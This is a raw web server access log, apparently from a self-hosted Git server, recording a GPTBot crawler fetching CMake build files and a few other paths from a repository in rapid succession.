"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:53:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11374] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:53:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11315] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:53:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11290] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:53:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11658] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:53:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16061] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:53:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11735] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:53:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11307] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:53:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13184] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:53:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10240] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:53:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:53:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 10018] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:53:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10277] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10679] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14926] [Gzip 9.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12085] [Gzip 5.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10010] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10014] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10013] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10016] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10245] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11190] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10367] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10303] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:54:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10212] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:54:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:54:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:54:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10021] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 10012] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10019] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10030] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:54:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13921] [Gzip 8.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10113] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:54:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:16:54:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10655] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10303] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:16:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr 